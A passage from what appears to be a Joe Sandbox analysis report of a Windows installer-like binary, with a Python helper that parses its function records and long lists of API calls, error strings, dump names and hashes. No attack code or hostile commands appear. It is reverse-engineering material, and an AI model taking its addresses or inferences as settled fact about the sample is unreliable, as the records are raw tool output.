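• GetLastError.KERNEL32 ref: 007D8E41
Strings
Similarity
• API ID: lstrlen$Value
• String ID: BundleUpgradeCode$regutil.cpp
• API String ID: 198323757-1648651458
"""

# One resolved call site: optional "Part of subcall function X:" prefix,
# API.MODULE, optional argument list, and the referencing address.
API_RE = re.compile(
    r"^• (?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[\w@]+)\.(?P<module>[\w.-]+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]{8})$")
# One referenced string with the addresses that use it.
STR_RE = re.compile(r"^• (?P<text>.*), xrefs: (?P<xrefs>[0-9A-F]{8}(?:, [0-9A-F]{8})*)$")
# Generic "Key: value" bullets (Similarity IDs, dump-source fields).
KV_RE = re.compile(r"^• (?P<key>[\w ]+): (?P<value>.*)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (api, module, args, ref, subcall)
    strings: list = field(default_factory=list)  # (text, [xref addresses])
    meta: dict = field(default_factory=dict)     # Similarity / dump-source fields


def parse_records(text):
    """Split the flat report text into one FunctionRecord per 'APIs' block."""
    records, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()  # subcall entries are indented in the report
        if line == "APIs":  # a new function record starts with its API list
            cur = FunctionRecord()
            records.append(cur)
            section = "APIs"
            continue
        if line in ("Strings", "Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin"):
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append((m["api"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], m["xrefs"].split(", ")))
        elif (m := KV_RE.match(line)):
            cur.meta[m["key"]] = m["value"]
    return records


def api_summary(records):
    """module -> sorted API names; the quickest view of what the functions call."""
    out = {}
    for r in records:
        for api, module, _args, _ref, _sub in r.apis:
            out.setdefault(module, set()).add(api)
    return {module: sorted(apis) for module, apis in out.items()}


def source_files(records):
    """Source file names leaked through log strings (e.g. elevation.cpp)."""
    names = set()
    for r in records:
        names.update(t for t, _ in r.strings if t.endswith(".cpp"))
        names.update(p for p in r.meta.get("String ID", "").split("$") if p.endswith(".cpp"))
    return sorted(names)


def strings_matching(records, needle):
    """Strings containing `needle` with their xrefs, to jump to in a disassembler."""
    needle = needle.lower()
    return [(t, x) for r in records for t, x in r.strings if needle in t.lower()]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(api_summary(recs))
    print(source_files(recs))
    print(strings_matching(recs, "elevat"))
```

Pointing parse_records at the text of this section of the report rather than SAMPLE gives the same structures for the real records; strings_matching(recs, "elevat") then returns the elevation.cpp xrefs (007DD46B, 007DD475, 007DD542, 007DD549, ...) that are the natural starting points for looking at the elevation code path in the dumped image at 007C0000.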

APIs
• InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 007D8E37
• GetLastError.KERNEL32 ref: 007D8E41
• SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 007D8EA1
Strings
• Failed to initialize ACL., xrefs: 007D8E6F
• cache.cpp, xrefs: 007D8E65
• Failed to allocate administrator SID., xrefs: 007D8E1D
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                              • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                                                                                                              • API String ID: 669721577-1117388985
                                                                                                                                                              • Opcode ID: 1168fc043a9b7d4cf4ad654b56ebcba52e34f65923f1b4f9cbac456abe62e4e3
                                                                                                                                                              • Instruction ID: b42b21462be4f0e07259e0d45345ec03a08c256cf3a93abb48303b0ac1d9637c
                                                                                                                                                              • Opcode Fuzzy Hash: 1168fc043a9b7d4cf4ad654b56ebcba52e34f65923f1b4f9cbac456abe62e4e3
                                                                                                                                                              • Instruction Fuzzy Hash: 8E21D832E40214F7DB619A959C46F9FB77DFF00B20F51416AB954FB380DA789D009A91
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,007D4028,00000001,feclient.dll,?,00000000,?,?,?,007C4B12), ref: 007C424D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007D4028,00000001,feclient.dll,?,00000000,?,?,?,007C4B12,?,?,0080B488,?,00000001), ref: 007C4259
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,007D4028,00000001,feclient.dll,?,00000000,?,?,?,007C4B12,?), ref: 007C4294
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007D4028,00000001,feclient.dll,?,00000000,?,?,?,007C4B12,?,?,0080B488,?,00000001), ref: 007C429E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectoryErrorLast
                                                                                                                                                              • String ID: crypt32.dll$dirutil.cpp
                                                                                                                                                              • API String ID: 152501406-1104880720
                                                                                                                                                              • Opcode ID: e56e74d0da9a75821fb4c96e97b29d24bdbc2526f0ed00d79308fc4dd0ace996
                                                                                                                                                              • Instruction ID: bdaa99abfac72eda93cf6045f758f50fd9ec774e809d58945c67062838f7e851
                                                                                                                                                              • Opcode Fuzzy Hash: e56e74d0da9a75821fb4c96e97b29d24bdbc2526f0ed00d79308fc4dd0ace996
                                                                                                                                                              • Instruction Fuzzy Hash: CB11A577E01637AB97315AD98856F5BBB98FF05760B11013DBE00E7350E728DC0096E0
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to write during cabinet extraction., xrefs: 007E0C35
                                                                                                                                                              • cabextract.cpp, xrefs: 007E0C2B
                                                                                                                                                              • Unexpected call to CabWrite()., xrefs: 007E0BC1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                              • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                              • API String ID: 1970631241-3111339858
                                                                                                                                                              • Opcode ID: 045038e87aceaca8c402fea3b6282462ad2e8deea827a22da9a76f06e21e49b9
                                                                                                                                                              • Instruction ID: 4e288af8cd365900f8799eb2ec1cf3aaca536af6c436317b2816a15369e3a236
                                                                                                                                                              • Opcode Fuzzy Hash: 045038e87aceaca8c402fea3b6282462ad2e8deea827a22da9a76f06e21e49b9
                                                                                                                                                              • Instruction Fuzzy Hash: E021FFB6501205ABCB14CF6EDC85DAA37A9FF88320B214259FE14C7351E6B9D9408BA0
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9AFB
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C9B10
                                                                                                                                                              • GetLastError.KERNEL32(?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C9B1B
                                                                                                                                                              Strings
                                                                                                                                                              • Failed while searching directory search: %ls, for path: %ls, xrefs: 007C9B54
                                                                                                                                                              • Failed to set variable., xrefs: 007C9B7A
                                                                                                                                                              • Failed to format variable string., xrefs: 007C9B06
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                              • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                              • API String ID: 1811509786-402580132
                                                                                                                                                              • Opcode ID: 7ba41b2ba6887a7e09191ad6c01a9120893a2ffac65c65ac9079388504e5a286
                                                                                                                                                              • Instruction ID: 5b7c4011f3e1003cf19705255e719fe10554dd122c989f542c605859fea93a48
                                                                                                                                                              • Opcode Fuzzy Hash: 7ba41b2ba6887a7e09191ad6c01a9120893a2ffac65c65ac9079388504e5a286
                                                                                                                                                              • Instruction Fuzzy Hash: 1D11D6B2940535FBDBA21E98AC4AF6EF728EF10770F10031DFA10A619087299D10E6D5
                                                                                                                                                              APIs
                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 007E0CC4
                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007E0CD6
                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 007E0CE9
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,007E08B1,?,?), ref: 007E0CF8
                                                                                                                                                              Strings
                                                                                                                                                              • Invalid operation for this state., xrefs: 007E0C9D
                                                                                                                                                              • cabextract.cpp, xrefs: 007E0C93
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                              • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 609741386-1751360545
                                                                                                                                                              • Opcode ID: 498df3ee4aec0212970965e616082ae131456e7f1c4274d9f5477556031f4411
                                                                                                                                                              • Instruction ID: 18f34658ee472847e519b735a493eec2fbdd119f7dd3bba67bcbb71c5865ca06
                                                                                                                                                              • Opcode Fuzzy Hash: 498df3ee4aec0212970965e616082ae131456e7f1c4274d9f5477556031f4411
                                                                                                                                                              • Instruction Fuzzy Hash: 8921D572902619ABC710DFA9CD099FABBBCFF087207104216F864D65D0D3B8E991CBE0
                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,007D539D), ref: 007D4AC3
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to write message type to pipe., xrefs: 007D4B05
                                                                                                                                                              • Failed to allocate message to write., xrefs: 007D4AA2
                                                                                                                                                              • pipe.cpp, xrefs: 007D4AFB
                                                                                                                                                              • crypt32.dll, xrefs: 007D4A7D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                              • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                              • API String ID: 3934441357-606776022
                                                                                                                                                              • Opcode ID: 68f66e0e56f6556416c30af178d09460b15ca4fbf7923e78341c0650c4c61594
                                                                                                                                                              • Instruction ID: 537aa7dfbacd0dfc1029c6cb2276fec1a598d8d899d76b710a818ea1cf2271bd
                                                                                                                                                              • Opcode Fuzzy Hash: 68f66e0e56f6556416c30af178d09460b15ca4fbf7923e78341c0650c4c61594
                                                                                                                                                              • Instruction Fuzzy Hash: 45119D72940129FBCB218F94DD09EDE7BB9EF40750F114066FD00B6350E7349E50D6A4
APIs
  • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
  • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
• _memcpy_s.LIBCMT ref: 007D4693
• _memcpy_s.LIBCMT ref: 007D46A6
• _memcpy_s.LIBCMT ref: 007D46C1
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: _memcpy_s$Heap$AllocateProcess
• String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
• API String ID: 886498622-766083570
• Opcode ID: 8f12d3fba594172a5c15e83f777bc8a56d3974ab3d5b918a3841e5a7fa881580
• Instruction ID: 3a4c5b5c159c92f7659eb580385a599fe80061f84e09116581a5f66369df031e
• Opcode Fuzzy Hash: 8f12d3fba594172a5c15e83f777bc8a56d3974ab3d5b918a3841e5a7fa881580
• Instruction Fuzzy Hash: A3115EB654420AABDB01AF94CC86DEB77ACEF05B10B00452AFA11DB251D779EA5487E0
APIs
• ShellExecuteExW.SHELL32(?), ref: 00803CC0
• GetLastError.KERNEL32(?,?,00000000), ref: 00803CCA
• CloseHandle.KERNEL32(?,?,?,00000000), ref: 00803CFD
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseErrorExecuteHandleLastShell
• String ID: <$PDu$shelutil.cpp
• API String ID: 3023784893-2418939910
• Opcode ID: 37c24001a408133d818796e1610947bc52bb293f3a8791981526ffd59e6d1467
• Instruction ID: e68097afd48246382962ee67d31d8265d1f2eba87528ee14280aaabb5652357e
• Opcode Fuzzy Hash: 37c24001a408133d818796e1610947bc52bb293f3a8791981526ffd59e6d1467
• Instruction Fuzzy Hash: A211D6B5E01229ABDB60DFA9D845A8EBBF8FB09750F104129FD15F7340E7349A10CBA4
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID:
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 0-1718035505
• Opcode ID: 673885c469736d8e89965df585ca86830cdb3aab97c3e573271feab98e0acd3f
• Instruction ID: f7e3830dab6110ededb414d1ce5fce41214a12e76dd3f6efac4d8ea878d7ab83
• Opcode Fuzzy Hash: 673885c469736d8e89965df585ca86830cdb3aab97c3e573271feab98e0acd3f
• Instruction Fuzzy Hash: FB01CD727533339BCFF00E656CD59972388F6223553108176E5F6D32C2EB52C8859690
APIs
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
• GetProcAddress.KERNEL32(00000000), ref: 00800AE7
• GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressErrorHandleLastModuleProc
• String ID: IsWow64Process$kernel32$procutil.cpp
• API String ID: 4275029093-1586155540
• Opcode ID: fe10cb55d7944aa197612d7bfa73bcbf393535ed4318989356c7c4f3674705a1
• Instruction ID: 0de26994ebacd55d51896327459c26ed60987e66673caf4bd237286c0c62ab49
• Opcode Fuzzy Hash: fe10cb55d7944aa197612d7bfa73bcbf393535ed4318989356c7c4f3674705a1
• Instruction Fuzzy Hash: B5F0A472A4063AABC7609B959D19E9BBB68FB00B61F414154BD14E7380EB74DE00CBD0
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007F3479,007F3479,?,?,?,007FA45C,00000001,00000001,ECE85006), ref: 007FA265
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007FA45C,00000001,00000001,ECE85006,?,?,?), ref: 007FA2EB
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007FA3E5
• __freea.LIBCMT ref: 007FA3F2
  • Part of subcall function 007F521A: HeapAlloc.KERNEL32(00000000,?,?,?,007F1F87,?,0000015D,?,?,?,?,007F33E0,000000FF,00000000,?,?), ref: 007F524C
• __freea.LIBCMT ref: 007FA3FB
• __freea.LIBCMT ref: 007FA420
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocHeap
• String ID:
• API String ID: 3147120248-0
• Opcode ID: ff9074bb2be8e519e98cc3b6d743757f1f264690143f104d694b887739d4b31e
• Instruction ID: 58d112fca8d63092f489ba1476458137419fc9af43d4bd423e353f20965e4830
• Opcode Fuzzy Hash: ff9074bb2be8e519e98cc3b6d743757f1f264690143f104d694b887739d4b31e
• Instruction Fuzzy Hash: B651E4B261021ABFDF298F68CC45EBF77A9EF44750F154629FE18D6240EB38DC809652
APIs
• GetLastError.KERNEL32 ref: 007D93C9
  • Part of subcall function 008056CF: GetLastError.KERNEL32(?,?,007D933A,?,00000003,00000000,?), ref: 008056EE
Strings
• cache.cpp, xrefs: 007D93ED
• Failed to read certificate thumbprint., xrefs: 007D93BD
• yT|, xrefs: 007D9287
• Failed to get certificate public key identifier., xrefs: 007D93F7
• Failed to find expected public key in certificate chain., xrefs: 007D938A
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp$yT|
• API String ID: 1452528299-295031655
• Opcode ID: 1fb315036a2e8ff2a4136e86f69cab2fd8c547c71a23e469572c28769275e4c5
• Instruction ID: 10f5af97777049aab627251bfd0cfc58fb1ea9b291a732b707c9abf014c7ec24
• Opcode Fuzzy Hash: 1fb315036a2e8ff2a4136e86f69cab2fd8c547c71a23e469572c28769275e4c5
• Instruction Fuzzy Hash: BF414272E04615EBDB10DBA9C845EAEB7B8BF08710F05416AFA15E7391D778ED40CBA0
APIs
• Sleep.KERNEL32(000007D0,00000000,00000000), ref: 007D8D18
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Sleep
• String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
• API String ID: 3472027048-398165853
• Opcode ID: 18ab38b27692faa8f7ed50cbec74d5cd18d58f45e28979450b83a0237589b536
• Instruction ID: 7ed0247189b2cc7f3a816b8447d66f0f9ec8f4af6900d012e97eefa331a7028f
• Opcode Fuzzy Hash: 18ab38b27692faa8f7ed50cbec74d5cd18d58f45e28979450b83a0237589b536
• Instruction Fuzzy Hash: 2231F472B40214BBEB626A548C46FBE667DEF28720F11402AFD04F63C1EA3D9D5056A6
                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcW.USER32(?,00000082,?,?), ref: 007DE985
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 007DE994
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 007DE9A8
                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 007DE9B8
                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 007DE9D2
                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 007DEA31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3812958022-0
                                                                                                                                                              • Opcode ID: dc8f573ed32a5b0293afd000b1ebb3f421912d1536b8a9b35d98b020101f7aae
                                                                                                                                                              • Instruction ID: 43bea82c8b8cd88fb3db70d602fede720a78eda7fa4356f9182f940a9229cfe7
                                                                                                                                                              • Opcode Fuzzy Hash: dc8f573ed32a5b0293afd000b1ebb3f421912d1536b8a9b35d98b020101f7aae
                                                                                                                                                              • Instruction Fuzzy Hash: 11219031104105BFDB16AFA8DC49E6A3BB6FF85310F158619FA0AAA3A4C735ED10DB51
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • elevation.cpp, xrefs: 007DC9B8
                                                                                                                                                              • Failed to save state., xrefs: 007DC891
                                                                                                                                                              • Unexpected elevated message sent to child process, msg: %u, xrefs: 007DC9C4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandleMutexRelease
                                                                                                                                                              • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                                                                                                              • API String ID: 4207627910-1576875097
                                                                                                                                                              • Opcode ID: 455539a68f5edb1b971b387a2ea33ca57e938129a620d6de0c293463d161865a
